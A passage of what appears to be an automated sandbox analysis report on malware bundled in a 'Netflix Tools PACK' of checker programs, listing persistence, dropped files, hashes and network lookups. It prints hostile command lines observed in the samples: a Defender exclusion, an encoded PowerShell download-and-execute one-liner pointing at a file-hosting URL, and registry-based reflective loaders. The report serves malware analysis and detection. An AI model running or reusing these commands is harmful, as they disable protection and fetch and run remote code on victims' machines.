memory/2840-221-0x00000000071A0000-0x0000000007236000-memory.dmp
memory/2840-222-0x0000000007150000-0x000000000715E000-memory.dmp
memory/2840-223-0x0000000007260000-0x000000000727A000-memory.dmp
memory/2840-224-0x0000000007240000-0x0000000007248000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
34s
Max time network
27s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/1228-133-0x0000000000740000-0x0000000000774000-memory.dmp
memory/1228-134-0x0000000005190000-0x000000000522C000-memory.dmp
memory/1228-135-0x00000000057E0000-0x0000000005D84000-memory.dmp
memory/1228-136-0x0000000005230000-0x00000000052C2000-memory.dmp
memory/1228-137-0x0000000005130000-0x000000000513A000-memory.dmp
memory/1228-138-0x0000000005420000-0x0000000005476000-memory.dmp
memory/1228-139-0x00000000050F0000-0x0000000005100000-memory.dmp
memory/4288-140-0x0000000000EB0000-0x0000000000EC4000-memory.dmp
memory/4288-141-0x0000000006E10000-0x0000000006E8E000-memory.dmp
memory/4288-142-0x0000000005770000-0x0000000005780000-memory.dmp
memory/4288-143-0x0000000005770000-0x0000000005780000-memory.dmp
memory/804-145-0x0000000000470000-0x0000000000AAC000-memory.dmp
memory/804-146-0x0000000005250000-0x0000000005270000-memory.dmp
memory/804-147-0x00000000056D0000-0x0000000005724000-memory.dmp
memory/804-148-0x00000000067C0000-0x0000000006CEC000-memory.dmp
memory/2572-149-0x00000000024D0000-0x0000000002506000-memory.dmp
memory/2572-150-0x0000000004F80000-0x00000000055A8000-memory.dmp
memory/2572-151-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2572-152-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2572-153-0x0000000005670000-0x0000000005692000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3rhcjsff.k20.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2572-159-0x0000000005730000-0x0000000005796000-memory.dmp
memory/2572-164-0x0000000005910000-0x0000000005976000-memory.dmp
memory/2572-165-0x0000000005E10000-0x0000000005E2E000-memory.dmp
memory/804-166-0x0000000005CC0000-0x0000000005CD0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4288-188-0x00000000069F0000-0x0000000006A66000-memory.dmp
memory/4288-189-0x00000000069D0000-0x00000000069EE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3212-204-0x00000000004F0000-0x0000000000502000-memory.dmp
memory/2572-206-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3212-205-0x0000000004D70000-0x0000000004D80000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/2572-208-0x00000000063D0000-0x0000000006402000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/2572-209-0x000000006F360000-0x000000006F3AC000-memory.dmp
memory/4868-222-0x00000000002D0000-0x00000000002E2000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2572-220-0x00000000063B0000-0x00000000063CE000-memory.dmp
memory/2572-226-0x0000000007750000-0x0000000007DCA000-memory.dmp
memory/2572-227-0x0000000007110000-0x000000000712A000-memory.dmp
memory/2572-228-0x0000000007180000-0x000000000718A000-memory.dmp
memory/2572-229-0x000000007FBD0000-0x000000007FBE0000-memory.dmp
memory/4868-230-0x0000000004A60000-0x0000000004A70000-memory.dmp
memory/2572-231-0x0000000007390000-0x0000000007426000-memory.dmp
memory/2572-232-0x0000000007340000-0x000000000734E000-memory.dmp
memory/2572-233-0x0000000007450000-0x000000000746A000-memory.dmp
memory/2572-234-0x0000000007430000-0x0000000007438000-memory.dmp
memory/804-237-0x0000000005CC0000-0x0000000005CD0000-memory.dmp
memory/3212-238-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4868-239-0x0000000004A60000-0x0000000004A70000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
17s
Max time network
37s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Checker Netflix.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.top4top.net | udp |
| FR | 195.154.118.206:443 | 6.top4top.net | tcp |
| US | 8.8.8.8:53 | 6.top4top.io | udp |
| FR | 195.154.118.206:443 | 6.top4top.io | tcp |
| US | 8.8.8.8:53 | 206.118.154.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | papa.hopto.org | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
Files
memory/4660-133-0x0000000000980000-0x00000000009B4000-memory.dmp
memory/4660-134-0x0000000005350000-0x00000000053EC000-memory.dmp
memory/4660-135-0x00000000059A0000-0x0000000005F44000-memory.dmp
memory/4660-136-0x0000000005490000-0x0000000005522000-memory.dmp
memory/4660-137-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4660-138-0x0000000005410000-0x000000000541A000-memory.dmp
memory/4660-139-0x0000000005660000-0x00000000056B6000-memory.dmp
memory/4588-140-0x0000000000980000-0x0000000000994000-memory.dmp
memory/4588-141-0x0000000002C20000-0x0000000002C30000-memory.dmp
memory/4588-142-0x0000000006900000-0x000000000697E000-memory.dmp
memory/4588-143-0x0000000002C20000-0x0000000002C30000-memory.dmp
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
memory/2232-159-0x0000000000CF0000-0x0000000000E70000-memory.dmp
C:\Users\Admin\AppData\Roaming\l1l1l.vbs
| MD5 | c78f607c916f060d6ee3bf391e303acc |
| SHA1 | 1575998cda060d4a570ba258abc12044601da283 |
| SHA256 | f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4 |
| SHA512 | cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b |
C:\Users\Admin\AppData\Roaming\powershell.js
| MD5 | 40b65baa1541784dd92f5aa8ae11b0ef |
| SHA1 | 0772c95f56a025704c01389f2d1108a17fb987cf |
| SHA256 | 9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699 |
| SHA512 | fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2 |
memory/3688-168-0x00000000049D0000-0x0000000004A06000-memory.dmp
C:\Users\Admin\AppData\Roaming\r1r1.vbs
| MD5 | 0494f414da149631c3d59861865dad37 |
| SHA1 | c9fd335759efb52e58acb974af27cdecb35d0f10 |
| SHA256 | a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56 |
| SHA512 | a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333 |
memory/2232-171-0x0000000005750000-0x0000000005760000-memory.dmp
memory/3688-170-0x0000000005110000-0x0000000005738000-memory.dmp
memory/3688-172-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3688-173-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3688-174-0x00000000050C0000-0x00000000050E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zy3aaw0l.z4p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3688-185-0x0000000005A90000-0x0000000005AF6000-memory.dmp
memory/3688-184-0x00000000059B0000-0x0000000005A16000-memory.dmp
memory/3688-189-0x0000000005F70000-0x0000000005F8E000-memory.dmp
memory/3776-190-0x0000000002A60000-0x0000000002A70000-memory.dmp
memory/3776-188-0x0000000002A60000-0x0000000002A70000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4588-221-0x00000000065C0000-0x0000000006636000-memory.dmp
memory/4588-222-0x00000000065A0000-0x00000000065BE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2992-241-0x0000000000E40000-0x0000000000E52000-memory.dmp
memory/2232-242-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2992-243-0x0000000005760000-0x0000000005770000-memory.dmp
memory/2748-244-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2748-245-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3688-247-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3172-246-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
